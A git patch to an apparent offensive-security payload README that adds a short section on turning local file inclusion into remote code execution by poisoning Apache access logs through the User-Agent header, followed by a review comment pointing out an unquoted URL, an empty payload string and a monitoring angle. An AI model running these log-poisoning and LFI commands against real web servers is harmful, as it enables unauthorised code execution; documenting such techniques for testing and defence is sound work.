From 61eed94f18c66dbb36524e00867083557551d481 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Mon, 10 May 2021 11:48:14 +0200 Subject: [PATCH] add RCE via Apache logs in log poisoning --- File Inclusion/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 8bb0a16..cc4a67f 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line. mail -s "" www-data@10.10.10.10. < /dev/null ``` +### RCE via Apache logs + +Poison the User-Agent in access logs: + +``` +$ curl http://example.org/ -A "" +``` + +Note: The logs will escape double quotes so use single quotes for strings in the PHP payload. + +Then request the logs via the LFI and execute your command. + +``` +$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id +``` + ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID)
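Review bot: the second `curl` command in the hunk is missing quotes around the URL, so a POSIX shell parses the `&` in `...access.log&cmd=id` as a background operator and the request goes out without the `cmd` parameter; wrap the URL in single quotes, e.g. `$ curl 'http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id'`. In the first `curl`, `-A ""` sets an empty User-Agent, so the line as committed shows no payload at all and the following note about using single quotes inside the PHP payload has nothing to refer to; either show the string being written into the log or state explicitly that it is omitted. The two new fences carry no language tag; tagging them (`bash`) would make the `$` prompt lines render as shell like the other snippets. It would also help readers on the defensive side to note that the injected string lands verbatim in the access log, which is exactly what a log-monitoring rule keys on.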